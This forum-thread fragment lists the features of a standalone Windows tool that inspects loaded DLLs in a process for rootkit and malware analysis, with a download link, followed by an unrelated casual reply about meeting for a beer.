      * Shows detailed information about each loaded DLL within a process to make manual analysis easier.
        - DLL Name
        - Company Name
        - Description
        - Comment about type of DLL (System, Hidden, Suspicious)
        - Load/reference count of DLL
        - Loading Type (static/dynamic)
        - DLL File Size
        - File Install Date
        - Base Address of DLL
        - Entry point of DLL
        - Full DLL File Path
      * It is a standalone tool which does not require any installation and can be executed directly.
      * Enriched user interface along with more user friendly options makes it the cool tool.

      Download: http://rootkitanalytics.com/downloadCounter.php?id=6
  25. Ah, I thought it was you. Because you're the only one from VL here that I know. If you buy a beer or two, I'll come. Anyway, I think we have mutual friends; I think I've seen photos of you on some friends' Facebook pages, I don't remember.